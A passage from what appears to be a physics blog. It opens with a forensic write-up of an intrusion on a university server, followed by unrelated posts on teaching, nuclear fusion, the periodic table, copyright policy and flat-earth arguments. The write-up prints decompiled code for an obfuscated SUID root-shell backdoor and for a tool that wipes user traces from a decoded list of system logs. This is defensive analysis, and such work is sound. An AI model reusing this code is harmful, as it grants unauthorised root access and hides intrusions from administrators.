-rw-r--r--   1 root root  2582 Apr  5  2018 fonts.conf
-rwxr-xr-x   1 root root 15136 Apr  5  2018 .low

Uhoh, a dot-file with SUID root?!? I had an evening to spare, so I could finally find out whether I can use some of the forensic tools that are around. As everybody knows, the most important one is "strings". But neither strings .fonts nor strings .low revealed anything interesting about those programs. So we need some heavier lifting. I chose Ghidra (thanks, NSA, for that) as my decompiler.

Let's look at .fonts (the suid one) first. It consists of one central function that I called runbash. Here is what I got after some renaming of symbols:

void runbash(void)

{
  char arguments [4];
  char command [9];
  int i;
  
  command[0] = 'N';
  command[1] = '\0';
  command[2] = '\n';
  command[3] = '\n';
  command[4] = 'J';
  command[5] = '\x04';
  command[6] = '\x06';
  command[7] = '\x1b';
  command[8] = '\x01';
  i = 0;
  while (i < 9) {
    command[i] = command[i] ^ (char)i + 0x61U;
    i = i + 1;
  }
  arguments[0] = '\x03';
  arguments[1] = '\x03';
  arguments[2] = '\x10';
  arguments[3] = '\f';
  i = 0;
  while (i < 4) {
    arguments[i] = arguments[i] ^ (char)i + 0x61U;
    i = i + 1;
  }
  setgid(0);
  setuid(0);
  execl(command,arguments,0);
  return;
}

There are two strings, command and arguments, and each is first XORed byte by byte with a value derived from the loop variable (the index plus 0x61). I ran that as a separate C program, and what it produces is that command ends up as "/bin/bash" and arguments as "bash". So all this program does is start a root shell. And indeed it does (I tried it on the server; of course it has been removed since then).

The second program, .low, is a bit longer. Its main function mainly deals with command line options, depending on which it calls one of three functions that I named machmitfile(), machshitmitfile() and writezerosinfile(). All of them take a file name as argument and modify those files by removing lines, overwriting stuff with zeros or doing some other rewriting that I did not analyse in detail:

/* WARNING: Could not reconcile some variable overlaps */

ulong main(int argc, char ** argv)

{
  char * __s1;
  char * pcVar1;
  bool opbh;
  bool optw;
  bool optb;
  bool optl;
  bool optm;
  bool opts;
  bool opta;
  int numberarg;
  char uitistgleich[40];
  passwd * password;
  char * local_68;
  char opt;
  uint local_18;
  uint retval;
  char * filename;

  scramble( &UTMP, 0xd);
  scramble( &WTMP, 0xd);
  scramble( &BTMP, 0xd);
  scramble( &LASTLOG, 0x10);
  scramble( &MESSAGES, 0x11);
  scramble( &SECURE, 0xf);
  scramble( &WARN, 0xd);
  scramble( &DEBUG, 0xe);
  scramble( &AUDIT0, 0x18);
  scramble( &AUDIT1, 0x1a);
  scramble( &AUDIT2, 0x1a);
  scramble( &AUTHLOG, 0x11);
  scramble( &HISTORY, 0x1b);
  scramble( &AUTHPRIV, 0x11);
  scramble( &DEAMONLOG, 0x13);
  scramble( &SYSLOG, 0xf);
  scramble( &ACHTdPROZENTs, 7);
  scramble( &OPTOPTS, 0xb);
  scramble( &UIDISPROZD, 7);
  scramble( &ERRORARGSEXIT, 0x11);
  scramble( &ROOT, 4);
  filename = (char * ) 0x0;
  local_18 = 0;
  opbh = false;
  optw = false;
  optb = false;
  optl = false;
  optm = false;
  opts = false;
  opta = false;
  now = time((time_t * ) 0x0);
  while (_opt = getopt(argc, argv, & OPTOPTS), _opt != -1) {
    switch (_opt) {
    case 0x61: /* 'a' */
      opta = true;
      break;
    case 0x62: /* 'b' */
      optb = true;
      break;
    default:
      printmessage();
      /* WARNING: Subroutine does not return */
      exit(1);
    case 0x66: /* 'f' */
      filename = optarg;
      break;
    case 0x68: /* 'h' */
      opbh = true;
      break;
    case 0x6c: /* 'l' */
      optl = true;
      break;
    case 0x6d: /* 'm' */
      optm = true;
      break;
    case 0x73: /* 's' */
      opts = true;
      break;
    case 0x74: /* 't' */
      local_18 = 1;
      numberarg = atoi(optarg);
      if (numberarg != 0) {
        numberarg = atoi(optarg);
        now = (time_t) numberarg;
        if ((0 < now) && (now < 0x834)) {
          now = settime();
        }
      }
      break;
    case 0x77: /* 'w' */
      optw = true;
    }
  }
  if (((((!opbh) && (!optw)) && (!optb)) && ((!optl && (!optm)))) && ((!opts && (!opta)))) {
    printmessage();
  }
  if (opbh) {
    if (argc <= optind + 1) {
      printmessage();
      /* WARNING: Subroutine does not return */
      exit(1);
    }
    if (filename == (char * ) 0x0) {
      filename = & UTMP;
    }
    retval = machmitfile(filename, argv[optind], argv[(long) optind + 1], (ulong) local_18);
  } else {
    if (optw) {
      if (argc <= optind + 1) {
        printmessage();
        /* WARNING: Subroutine does not return */
        exit(1);
      }
      if (filename == (char * ) 0x0) {
        filename = & WTMP;
      }
      retval = machmitfile(filename, argv[optind], argv[(long) optind + 1], (ulong) local_18);
    } else {
      if (optb) {
        if (argc <= optind + 1) {
          printmessage();
          /* WARNING: Subroutine does not return */
          exit(1);
        }
        if (filename == (char * ) 0x0) {
          filename = & BTMP;
        }
        retval = machmitfile(filename, argv[optind], argv[(long) optind + 1], (ulong) local_18);
      } else {
        if (optl) {
          if (argc <= optind) {
            printmessage();
            /* WARNING: Subroutine does not return */
            exit(1);
          }
          if (filename == (char * ) 0x0) {
            filename = & LASTLOG;
          }
          retval = writezerosinfile(filename, argv[optind], argv[optind]);
        } else {
          if (optm) {
            if (argc <= optind + 3) {
              printmessage();
              /* WARNING: Subroutine does not return */
              exit(1);
            }
            if (filename == (char * ) 0x0) {
              filename = & LASTLOG;
            }
            retval = FUN_00401bb0(filename, argv[optind], argv[(long) optind + 1],
              argv[(long) optind + 2], argv[(long) optind + 3]);
          } else {
            if (opts) {
              if (argc <= optind) {
                printmessage();
                /* WARNING: Subroutine does not return */
                exit(1);
              }
              local_68 = argv[optind];
              if (filename == (char * ) 0x0) {
                printmessage();
              } else {
                retval = machshitmitfile(filename, local_68, (ulong) local_18, local_68);
              }
            } else {
              if (opta) {
                if (argc <= optind + 1) {
                  printmessage();
                  /* WARNING: Subroutine does not return */
                  exit(1);
                }
                __s1 = argv[optind];
                pcVar1 = argv[(long) optind + 1];
                numberarg = strcmp(__s1, & ROOT);
                if (numberarg == 0) {
                  local_18 = 1;
                }
                machmitfile( & WTMP, __s1, pcVar1, (ulong) local_18);
                machmitfile( & UTMP, __s1, pcVar1, (ulong) local_18);
                machmitfile( & BTMP, __s1, pcVar1, (ulong) local_18);
                writezerosinfile( & LASTLOG, __s1, __s1);
                machshitmitfile( & MESSAGES, __s1, (ulong) local_18, __s1);
                machshitmitfile( & MESSAGES, pcVar1, (ulong) local_18, pcVar1);
                machshitmitfile( & SECURE, __s1, (ulong) local_18, __s1);
                machshitmitfile( & SECURE, pcVar1, (ulong) local_18, pcVar1);
                machshitmitfile( & AUTHPRIV, __s1, (ulong) local_18, __s1);
                machshitmitfile( & AUTHPRIV, pcVar1, (ulong) local_18, pcVar1);
                machshitmitfile( & DEAMONLOG, __s1, (ulong) local_18, __s1);
                machshitmitfile( & DEAMONLOG, pcVar1, (ulong) local_18, pcVar1);
                machshitmitfile( & SYSLOG, __s1, (ulong) local_18, __s1);
                machshitmitfile( & SYSLOG, pcVar1, (ulong) local_18, pcVar1);
                machshitmitfile( & WARN, __s1, (ulong) local_18, __s1);
                machshitmitfile( & WARN, pcVar1, (ulong) local_18, pcVar1);
                machshitmitfile( & DEBUG, __s1, (ulong) local_18, __s1);
                machshitmitfile( & DEBUG, pcVar1, (ulong) local_18, pcVar1);
                machshitmitfile( & AUDIT0, __s1, (ulong) local_18, __s1);
                machshitmitfile( & AUDIT0, pcVar1, (ulong) local_18, pcVar1);
                machshitmitfile( & AUDIT1, __s1, (ulong) local_18, __s1);
                machshitmitfile( & AUDIT1, pcVar1, (ulong) local_18, pcVar1);
                machshitmitfile( & AUDIT2, __s1, (ulong) local_18, __s1);
                machshitmitfile( & AUDIT2, pcVar1, (ulong) local_18, pcVar1);
                machshitmitfile( & AUTHLOG, __s1, (ulong) local_18, __s1);
                machshitmitfile( & AUTHLOG, pcVar1, (ulong) local_18, pcVar1);
                machshitmitfile( & HISTORY, __s1, (ulong) local_18, __s1);
                retval = machshitmitfile( & HISTORY, pcVar1, (ulong) local_18, pcVar1);
                password = getpwnam(__s1);
                if (password != (passwd * ) 0x0) {
                  sprintf(uitistgleich, & UIDISPROZD, (ulong) password->pw_uid);
                  machshitmitfile( & SECURE, uitistgleich, (ulong) local_18, uitistgleich);
                  machshitmitfile( & AUDIT0, uitistgleich, (ulong) local_18, uitistgleich);
                  machshitmitfile( & AUDIT1, uitistgleich, (ulong) local_18, uitistgleich);
                  retval = machshitmitfile( & AUDIT2, uitistgleich, (ulong) local_18, uitistgleich);
                }
              }
            }
          }
        }
      }
    }
  }
  return (ulong) retval;
}

But what are the file names? They sit in some memory locations pre-initialized at startup, but remember, strings did not show anything interesting.
That is because, before anything else, a function scramble() is called on them:

void scramble(char *p,int count)

{
  int m;
  int i;
  
  if (0 < count) {
    m = count * 0x8249;
    i = 0;
    while (m = (m + 0x39ef) % 0x52c7, i < count) {
      p[i] = (byte)m ^ p[i];
      m = m * 0x8249;
      i = i + 1;
    }
  }
  return;
}

As you can see, once more there is some XORing going on to hide the ASCII file names. So, once more, I put the initial data as well as this function in a separate C program and it produced:

603130: /var/run/utmp
60313e: /var/log/wtmp
60314c: /var/log/btmp
603160: /var/log/lastlog
603180: /var/log/messages
6031a0: /var/log/secure
6031b0: /var/log/warn
6031be: /var/log/debug
6031d0: /var/log/audit/audit.log
6031f0: /var/log/audit/audit.log.1
603210: /var/log/audit/audit.log.2
603230: /var/log/auth.log
603250: /var/log/ConsoleKit/history
603270: /var/log/authpriv
603290: /var/log/daemon.log
6032b0: /var/log/syslog

Ah, these are the log files from which you want to remove your traces.

This is as far as my analysis goes. In case you want to look at this yourself, I put everything (both binaries, the Ghidra file, my separate C program) in a tarball for you to download.

What all this does not show: how the attackers got in in the first place (possibly by stealing some user's private keys on another compromised machine), how they did the privilege escalation needed to produce a SUID-root file, and for how long they have been around. As you can see above, the files have a time stamp from over two years ago. But once you are root, you can of course set this to whatever you want. Then again, it is not clear why you would want to backdate your backdoor. I should stress that I am only a normal user on that server, so, for example, I don't have access to the backups to check whether these files have really been around for that long.

Furthermore, the things I found are not very sophisticated. Yes, they prevented me from finding out what's going on with strings by obfuscating their strings. But the rest was so straightforward that even an amateur like myself could figure out what is going on with a bit of decompiling. Plus, leaving your backdoor lying around in the file system in plain sight as a SUID program is not very secretive (but possibly enough to go undetected for more than two years). So unless these two files were put there deliberately to be found, the attacker is not the most subtle one.

Which leaves the question about the attacker's motivation. Was it only for sports (bringing some thousand CPUs under control)? Was it for bitcoin mining (the most direct way to turn this advantage into material gain)? Or did they try to steal data/files etc?

If you have an account on one of the affected machines (in our case that would be anybody with a physics account at LMU, as at least one affected machine had your home directory mounted), you should revoke all your secret keys that were stored there (GPG or ssh; in the latter case that means in particular deleting them from .ssh/authorized_keys and .ssh/authorized_keys2 everywhere, not just on the affected machines). And you should consider all data on those machines compromised (whatever consequences that might have for you). If attackers had access to your ssh private keys, they could just as well be on all machines that those keys allow you to log into without entering further passwords/passphrases/OTPs.

Please comment: Should online teaching be public?

2020-04-10T14:19:00.001+02:00

I write this post because I am genuinely interested in people's opinions. So please comment even if you usually wouldn't, and it's ok to simply say you agree with somebody's opinion (or not). And of course you can do this anonymously or under a pseudonym.

The question is: What is the right balance between participants' privacy and making things public in the name of public knowledge? Let me explain.

In these times where everybody has to stay at home and the summer semester is only one week away, everybody is busy planning how to run university teaching over the internet. And personally, I am quite optimistic. It's not the real thing, but essentially all the tools are there, and I see this as a chance to try out new things and experiment while everybody will tolerate it if things are not perfect, at least as long as you are honestly trying. Maybe this way, we can bring university to the 21st century. And yes, some things would work better if there had been more preparation and planning, but without the current urgency, inertia might have kept many things from happening at all.

This summer, together with Sabine Jansen from the math department, I will once more teach the TMP core module "Mathematical Statistical Physics" as the physicist on the stage. At least in my interpretation, this course is mainly about how to honestly deal with systems with infinitely many degrees of freedom and understand the choices you have to make when handling them which then lead to phenomena like phase transitions, coexistence of phases and spontaneous symmetry breaking. I will mainly discuss the quantum part of the story using tools from the algebraic approach where the central objects are KMS states. I recorded a trailer video:

Regarding tools, I will pretty much do what Clifford suggested, that is, use Zoom for the lectures, where I share the screen of my iPad while writing on it like a notepad and do pretty much what I would have done on a blackboard, while talking so that people can see my face. I plan to do this live so there can be questions, feedback and discussions, both for the benefit of the participants asking questions and for me, trying not to talk completely over people's heads or bore everybody to death. In addition there will be a Moodle for handling exercise sheets, a forum and a chat as well as tutorials (also via Zoom). And, and this is the point of this post: I want to record the Zoom sessions of the lectures and make those available for later consumption.

And here is the point: I strongly believe in the principle that knowledge and information are the one commodity that does not get smaller by being shared. If everybody contributes a little bit, this allows us as a community to build huge things. This idea is for example behind Open Source software and Wikipedia and has proven very successful in building many things from which everybody can benefit a lot.

In this spirit, it is my impulse that of course the recorded lectures should be available to everybody on the internet. And yes, I would love to see other people's lectures as well, most of which will of course be much better than my own. I think this is particularly true for an advanced course like ours, which is unlike the millionth electrodynamics course that every physics department in the world teaches every year. I hope our content might be interesting to many people around the world, and many of those would not have access to local lectures about it.

And yes, I am not super prepared for this course. I will make mistakes, say wrong things and make a fool of myself. But even then, I think it's worth it. Of course, I am in a privileged situation: I cannot see myself job hunting in the foreseeable future, I am very much settled. So my risk is mainly that everybody can see how stupid I am. But that's it. And to be honest, I rather expect that, if there is any effect at all, it will be to my advantage, because there is hope that one or two people might think we are teaching interesting stuff.

But there is a concern that this might not be the same for everybody. Remember, the idea of live teaching and not pre-recording everything is to allow for interactions with the audience. And the way Zoom recordings work is that those reactions are recorded as well. Participants can choose other names and turn off their camera. But the question (clever or stupid) that anybody asks will be recorded nevertheless. And people might be concerned about this. And the fact that the whole world can later hear them asking what somebody might consider a stupid question might prevent them from asking the question at all. All this while my main worry should be the benefit of my own students rather than myself becoming an internet celebrity.

I would like to take into account that the benefit is not only about having my lectures available (that benefit is likely very, very small). What I am talking about is establishing a culture that over the long run makes many people's lectures available. And those are much more likely to be useful for many. While contemplating this in the example of my lectures, I imagine that many lecturers might have similar thoughts at the same time (or at least I would like them to). This is in line with the idea I talked about in an old post: that the possibility of taking advantage of an asymmetric outcome in a prisoner's dilemma might be an illusion.

And what adds to it is that the people who would be hurt most by this are likely those who deserve the most support: timid ones, women, minorities.

So, what should I do? From what I have written you will gather that I am very much in favour of sharing knowledge as much as possible. But I am willing to take concerns into account. I want to take actual concerns into account, though, and not those that one can simply imagine someone might have. So please tell me, what do you think? And yes, if you are the timid person, you might be less likely to leave a comment in a public blog. But please consider doing it nevertheless. Do it anonymously. It doesn't hurt. Of course, you can also email me. That, too, can be done anonymously.

On Nuclear Fusion (in German)

2019-11-04T12:53:00.002+01:00

Florian Freistetter has posed the challenge in his blog to write a generally accessible text on why nuclear fusion works. Here is my attempt (according to the rules in German):

Birds of a feather flock together

Water drops on a surface, globules of fat in soup, bubbles in lemonade (or in the body of a diver, see my other blog) and, indeed, atomic nuclei: these phenomena have in common that surface tension plays a decisive role.

What they all share is that there is a substance (water, fat, gas, nucleons, i.e. protons and neutrons, the constituents of the atomic nucleus) that likes it best when it is surrounded by itself rather than by the environment (air, soup, which is mainly water, lemonade, or vacuum). In all these examples the substance can arrange itself better when it is surrounded by its own kind. An interface, on the other hand, costs energy, the interfacial energy.

To a good approximation, this energy cost is proportional to the area of the interface. If there has to be an interface at all, it is most favorable to keep it as small as possible. Since the amount of substance, and hence its volume, is fixed in each case, a round shape emerges (a disk or a ball, depending on whether we are dealing with something two-dimensional like fat globules or three-dimensional like bubbles), which has the smallest surface for this given volume (in the two-dimensional case, the "surface" is correspondingly the length of the boundary, while the "volume" is the area).

But what happens when two drops, fat globules, bubbles or atomic nuclei come together? When they merge, the combined volume is as large as the two volumes together before. The surface, however, is smaller than the sum of the surfaces before. Hence less interfacial energy is needed, and the remaining energy is released. In soup this is so little that you normally only notice it in the fact that the fat globules merge into ever larger ones; for atomic nuclei, however, it is so much (a few megaelectronvolts per nucleus) that you can run a fusion power plant or a star on it.

So the energy released comes from fewer nucleons having an open flank to the vacuum; for them it is more favorable to lie right next to each other.

So much for the qualitative picture. But we can easily make it quantitative: the droplet that resulted from the merger of two smaller ones must have twice the volume of one of the original droplets. But since the volume of a three-dimensional body grows with the third power of its diameter, the large droplet does not have twice the diameter of the small droplets but is only larger by a factor of $2^{1/3}$, i.e. the cube root of 2, about 1.26.

The surface, by contrast, grows quadratically with the diameter, so it is larger by a factor of $2^{2/3}$, about 1.59. At the beginning, however, we had two droplets and thus twice the surface; at the end only 1.59 times the surface of one small droplet. So we have gained the interfacial energy of 0.41 small-droplet surfaces.
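The arithmetic of the last two paragraphs fits into three lines. As a sketch, write $d$, $V$ and $S$ for the diameter, volume and surface of one small droplet and $d'$, $V'$, $S'$ for the merged one (these symbols are introduced here only for illustration):

$$ V' = 2V, \quad V \propto d^3 \quad\Rightarrow\quad d' = 2^{1/3}\, d \approx 1.26\, d, $$

$$ S \propto d^2 \quad\Rightarrow\quad S' = 2^{2/3}\, S \approx 1.59\, S, $$

$$ \Delta S = 2S - S' = \left(2 - 2^{2/3}\right) S \approx 0.41\, S. $$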

Therefore, over time more and more droplets will merge into a few large drops, since the latter in total have less surface exposed to the air.

It is exactly the same with atomic nuclei. They too reduce their total surface towards the vacuum by coming together, and in this merger, or fusion, the corresponding surface energy is released.

For atomic nuclei, however, there are further contributions to the energy, which become important above all for large nuclei with many nucleons and which ensure that nuclei that are too large, although they have a smaller surface than the sum of their possible fragments, are nevertheless energetically less favorable, so that there is an energetically most favorable nuclear size (this is, if I remember my studies correctly, the nucleus of the element iron).

First there is the "Pauli exclusion principle", which prevents two nucleons from being in exactly the same state in the nucleus. They have to differ in at least one respect. This can be, e.g., their angular momentum (spin) or their "isospin", i.e. whether they are a proton or a neutron. But if they agree in all these respects, they must at least occupy different energy levels in the nucleus. When further nucleons are added, the lowest energy levels are already occupied and they have to take a higher one (which costs exactly this energy).

Inside the nucleus, however, neutrons can convert into protons and back (this is beta decay); so if, say, a neutron is added and would have to occupy a high neutron energy level, it can, if a more favorable proton level is still free, convert into a proton (emitting an electron and an antineutrino so that the charge works out as well). Here there is an energy contribution that depends separately on the proton number and the neutron number and becomes more expensive the larger the nucleus is.

A further effect is that the protons are electrically charged and repel the other protons. In the total energy balance of a nucleus this too costs energy, proportional to the square of the proton number (and thus unfavorable for nuclei that are too large).

Adding all this up, one sees that for small nuclei one first gains a great deal of interfacial energy by merging them into a larger one. From a medium nuclear size onward the other effects begin to dominate, and nuclei that are too large are again not favorable, which is why one can gain energy again through nuclear fission, i.e. splitting up such overly large nuclei.
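For readers who want a formula: the contributions described above are usually collected in the semi-empirical (Bethe-Weizsäcker) mass formula. The text above does not name it, so take this as an illustrative summary in standard textbook notation rather than as part of the original argument. With proton number $Z$, neutron number $N$, mass number $A = Z + N$ and positive fit constants $a_V, a_S, a_C, a_A$, the binding energy is roughly (omitting the small pairing term)

$$ E_B \approx a_V A - a_S A^{2/3} - a_C \frac{Z^2}{A^{1/3}} - a_A \frac{(N-Z)^2}{A}. $$

The second term is the surface energy (the radius grows like $A^{1/3}$, so the surface like $A^{2/3}$), the third is the Coulomb repulsion of the protons, and the fourth is the Pauli cost of an unequal number of protons and neutrons.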

Proving the Periodic Table

2019-03-29T12:02:00.000+01:00

The year 2019 is the International Year of the Periodic Table, celebrating the 150th anniversary of Mendeleev's discovery. This prompts me to report on something that I learned in recent years when co-teaching "Mathematical Quantum Mechanics" with mathematicians, in particular with Heinz Siedentop: we know less about the mathematics of the periodic table than I thought.

In high school chemistry you learned that the periodic table comes about because of the orbitals in atoms. There is Hund's rule that tells you the order in which you have to fill the shells and, within them, the orbitals (s, p, d, f, ...). Then, in your second semester in university, you learn to derive those using Schrödinger's equation: you diagonalise the Hamiltonian of the hydrogen atom and find the shells in terms of the main quantum number $n$ and the orbitals in terms of the angular momentum quantum number $L$, as $L=0$ corresponds to s, $L=1$ to p and so on. And you fill the orbitals thanks to the Pauli exclusion principle. So, this proves the story of the chemists.

Except that it doesn't: This is only true for the hydrogen atom. But the Hamiltonian for an atom with nuclear charge $Z$ and $N$ electrons (so we allow for ions) is (in convenient units)

$$ H = -\sum_{i=1}^N \Delta_i -\sum_{i=1}^N \frac{Z}{|x_i|} + \sum_{i\lt j}^N\frac{1}{|x_i-x_j|}.$$

The story of the previous paragraph would be true if the last term, the Coulomb interaction between the electrons, were not there. In that case, there would be no interaction between the electrons, and we could solve a hydrogen-type problem for each electron separately and then anti-symmetrise the wave functions in the end in a Slater determinant to take into account their fermionic nature. But of course, in the real world, the Coulomb interaction is there and it contributes like $N^2$ to the energy, so (for almost neutral atoms) it is of the same order as the $ZN$ of the electron-nucleus potential.
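To make the non-interacting case concrete, here is a short sketch. The symbols $H_0$, $h$, $\epsilon_n$ and $\phi_j$ are my notation for this illustration, and I assume that the "convenient units" are the ones read off from the Hamiltonian as written, with no factor $1/2$ in front of the Laplacian. Dropping the last term leaves a sum of one-particle operators,

$$ H_0 = \sum_{i=1}^N h_i, \qquad h = -\Delta - \frac{Z}{|x|}, $$

and the bound state energies of $h$ are the hydrogen-like levels

$$ \epsilon_n = -\frac{Z^2}{4n^2}, \qquad n = 1, 2, 3, \ldots $$

Picking $N$ distinct one-particle eigenstates $\phi_1, \ldots, \phi_N$ (including spin), the anti-symmetrised product

$$ \Psi(x_1, \ldots, x_N) = \frac{1}{\sqrt{N!}} \det\big[\phi_j(x_i)\big]_{i,j=1}^N $$

is an eigenfunction of $H_0$ whose energy is the sum of the corresponding $\epsilon_n$. This is exactly the "fill the shells from below" picture, and it is exact only because $H_0$ contains no electron-electron term.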

The approximation of dropping the electron-electron Coulomb interaction is well known in condensed matter systems, where the resulting theory is known as a "Fermi gas". There it gives you band structure (which is then used to explain how a transistor works).

Band structure in a NPN-transistor

Also in that case, you pretend there is only one electron in the world that feels the periodic electric potential created by the nuclei and all the other electrons which don't show up anymore in the wave function but only as charge density.

For atoms you could try to make a similar story by taking the inner electrons into account by saying that the most important effect of the ee-Coulomb interaction is to shield the potential of the nucleus thereby making the effective $Z$ for the outer electrons smaller. This picture would of course be true if there were no correlations between the electrons and all the inner electrons are spherically symmetric in their distribution around the nucleus and much closer to the nucleus than the outer ones. But this sounds more like a day dream than a controlled approximation.

In the condensed matter situation, the standing for the Fermi gas is much better as there you could invoke renormalisation group arguments as the conductivities you are interested in are long wave length compared to the lattice structure, so we are in the infra red limit and the Coulomb interaction is indeed an irrelevant term in more than one euclidean dimension (and yes, in 1D, the Fermi gas is not the whole story, there is the Luttinger liquid as well).

But for atoms, I don't see how you would invoke such RG arguments.

So what can you do (with regards to actually proving the periodic table)? In our class, we teach how Lieb and Simon showed that in the $N=Z\to \infty$ limit (which in some sense can also be viewed as the semi-classical limit when you bring in $\hbar$ again) the ground state energy $E^Q$ of the Hamiltonian above is in fact approximated by the ground state energy $E^{TF}$ of the Thomas-Fermi model (the simplest of all density functional theories, where instead of the multi-particle wave function you only use the one-particle electronic density $\rho(x)$ and approximate the kinetic energy by a term like $\int \rho^{5/3}$, which is exact for the free Fermi gas in empty space):

$$E^Q(Z) = E^{TF}(Z) + O(Z^2)$$

where by a simple scaling argument $E^{TF}(Z) \sim Z^{7/3}$. More recently, people have computed more terms in this asymptotic expansion, which proceeds in powers of $Z^{-1/3}$: the second term ($O(Z^{6/3})= O(Z^2)$) is known and people have put a lot of effort into $O(Z^{5/3})$, but it should be clear that this technology is still very, very far from proving anything "periodic", which would be $O(Z^0)$. So don't hold your breath hoping to find the periodic table from this approach.
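
For reference, the scaling argument can be spelled out as follows. This is only a sketch: $c$ is a fixed constant whose value does not matter here, and I am assuming the standard form of the Thomas-Fermi functional for nuclear charge $Z$ and $N=Z$ electrons,

$$\mathcal E_Z(\rho) = c\int \rho^{5/3}\,dx - Z\int\frac{\rho(x)}{|x|}\,dx + \frac12\iint\frac{\rho(x)\rho(y)}{|x-y|}\,dx\,dy,\qquad \int\rho\,dx = Z.$$

Substituting $\rho(x) = Z^2\tilde\rho(Z^{1/3}x)$ with $\int\tilde\rho = 1$, each of the three terms picks up the same factor $Z^{7/3}$,

$$\mathcal E_Z(\rho) = Z^{7/3}\,\mathcal E_1(\tilde\rho),$$

so minimising over $\rho$ gives $E^{TF}(Z) = Z^{7/3}E^{TF}(1)$.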

On the other hand, chemistry of the periodic table (where the column is supposed to predict chemical properties of the atom expressed in terms of the orbitals of the "valence electrons") works best for small atoms. So, another sensible limit appears to be to keep $N$ small and fixed and only send $Z\to\infty$. Of course this is not really describing atoms but rather highly charged ions.

The advantage of this approach is that in the above Hamiltonian, you can absorb the $Z$ of the electron-nucleus interaction into a rescaling of $x$, which then lets $Z$ reappear in front of the electron-electron term as $1/Z$. Then in this limit, one can try to treat the ugly unwanted ee-term perturbatively.
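
Spelled out as a short check of the rescaling (the new coordinates $y_i = Z x_i$ are my notation): since $\Delta_{x_i} = Z^2\Delta_{y_i}$ and $1/|x| = Z/|y|$, the Hamiltonian above becomes

$$H = Z^2\left(-\sum_{i=1}^N \Delta_{y_i} - \sum_{i=1}^N\frac{1}{|y_i|} + \frac1Z\sum_{i\lt j}^N\frac{1}{|y_i-y_j|}\right),$$

so for fixed $N$ and $Z\to\infty$ the electron-electron term is a small perturbation of $N$ independent hydrogen problems.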

Friesecke (from TUM) and collaborators have made impressive progress in this direction and in this limit they could confirm that for $N < 10$ the chemists' picture is actually correct (with some small corrections). There are very nice slides of a seminar talk by Friesecke on these results.

Of course, as a practitioner, this will not surprise you (after all, chemistry works) but it is nice to know that mathematicians can actually prove things in this direction. But there is still some way to go even 150 years after Mendeleev.

Smoke screen: the CDU proposal on "no upload filters"

2019-03-16T10:43:00.000+01:00

Sorry, this is one of the occasional posts about German politics and was thus originally written in German. It is my posting to a German-speaking mailing list discussing the upcoming EU copyright directive (which must be stopped in its current form!!! March 23rd is the international protest day). The CDU party has now proposed how to implement it in German law, although so unspecifically that all the problematic details are left out. Here is the post.

Maybe I am too dense, but I do not understand where exactly the progress is supposed to be compared to what is being discussed at the EU level. Except that the CDU proposal is so vague that all internal contradictions disappear in the fog. At the EU level, too, the proponents say that one should much rather acquire licenses than filter. That in itself is not new.

What is new, at least in this Handelsblatt article (I have not found it anywhere else), is the mention of hash sums ("digital fingerprint"), or is that rather meant to be something like a digital watermark? That would be a real novelty, but it would immediately nip the whole procedure in the bud, since only the original file would be protected (which would be trivial to detect anyway), while every form of derived work would slip completely through the net and one could "liberate" works by a trivial modification. Otherwise we are back to the dubious filters based on AI technology that does not yet exist today.

The other thing is the blanket license. So I would no longer have to conclude contracts with all authors but only with the VG Internet. But there again is the big prize question of whom it should apply to. Intended are of course once again YouTube, Google and FB. But how do you phrase that? That is after all the central bone of contention of the EU directive: Everybody needs a blanket license, unless they are non-commercial (who is that, really), or (younger than three years and with few users and small revenue), or one is Wikipedia, or one is GitHub? That would again be the "the internet is like television, with a few big broadcasters and so on, only somehow different" view that is so eagerly propagated by people who look at the internet from afar. Because it practically flattens everything else. What about forums or photo hosters? Would they all have to acquire a blanket license (which would have to be priced so high that it covers all film and music rights of the whole world)? What prevents this from ending up as a "whoever operates a service on the internet has to acquire a paid internet license before going online" law, which at any non-trivial level of the license fee would be the end of all grass roots innovation?

It would of course also be interesting how the revenue of the VG Internet is distributed. It would be a real surprise if a large part of it did not end up with, for example, the press publishers. That would then finally be the "take the money away from those who earn it on the internet and give it to us, who no longer earn so much" law. Then the license fee should ideally be a percentage of revenue, so ideally an internet tax.

And I will not even start on what it leads to if all European countries cook their own implementation soup in such a blatant way.

All in all a rather successful coup by the CDU, which may manage to take the wind out of the sails of the critics of Article 13 in public opinion by wrapping everything in a vague cloud of fog, while all the problematic provisions are likely to lie in the details.

Challenge: How to talk to a flat earther?

2019-03-06T15:06:00.004+01:00

Further down the rabbit hole, over lunch I finished watching "Behind the Curve", a Netflix documentary on people believing the earth is a flat disk. According to them, the north pole is in the center, while Antarctica is an ice wall at the boundary. Sun and moon are much closer and flying above this disk while the stars are on some huge dome like in a planetarium. NASA is a fake agency promoting the doctrine and airlines must be part of the conspiracy as they know that you cannot directly fly between continents on the southern hemisphere (really?).

These people are happily using GPS for navigation but have a general mistrust in the science (and their teachers) of at least two centuries.

Besides the obvious "I don't see curvature of the horizon" they are even conducting experiments to prove their point (fighting with laser beams not being as parallel over miles of distance as they had hoped for). So at least some of them might be open to empirical disproof.

So here is my challenge: Which experiment would you conduct with them to convince them? Warning: Everything involving stuff disappearing at the horizon (ships sailing away, being able to see further from a tower) is complicated by non-trivial refraction in the atmosphere, which would very likely render this observation inconclusive. The sun being at different elevation (height above the horizon) at different places might also be explained by it being much closer, and a Foucault pendulum might be too indirect to really convince them (plus it requires some non-elementary math to analyse).

My personal solution is to point to the observation that the elevation of Polaris above the horizon (around which I hope they can agree the night sky rotates) is given by the geographical latitude: At the north pole it is right above you but it has to go down the further south you get. I cannot see how this could be reconciled with a dome projection.
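
To make the mismatch concrete, here is a minimal sketch of what one naive flat-disk model would predict. Everything in it is my own assumption for illustration, not a claim about what flat earthers actually propose: distances from the pole are taken proportional to 90° minus the latitude, Polaris sits at a fixed height straight above the pole, and that height is calibrated so that the model is right at one latitude (`calib_latitude_deg`, a hypothetical parameter).

```python
import math


def flat_disk_elevation(latitude_deg, calib_latitude_deg=45.0):
    """Elevation (degrees) of Polaris in a hypothetical flat-disk model.

    Assumptions (illustration only): the distance from the north pole is
    proportional to (90 - latitude), and Polaris hovers at a fixed height
    above the pole, chosen such that the model reproduces the observed
    elevation at calib_latitude_deg.
    """
    distance = 90.0 - latitude_deg            # in "degrees of latitude"
    calib_distance = 90.0 - calib_latitude_deg
    height = calib_distance * math.tan(math.radians(calib_latitude_deg))
    return math.degrees(math.atan2(height, distance))


if __name__ == "__main__":
    # On the globe the observed elevation simply equals the latitude.
    for latitude in (15, 30, 45, 60, 75):
        print(latitude, round(flat_disk_elevation(latitude), 1))
```

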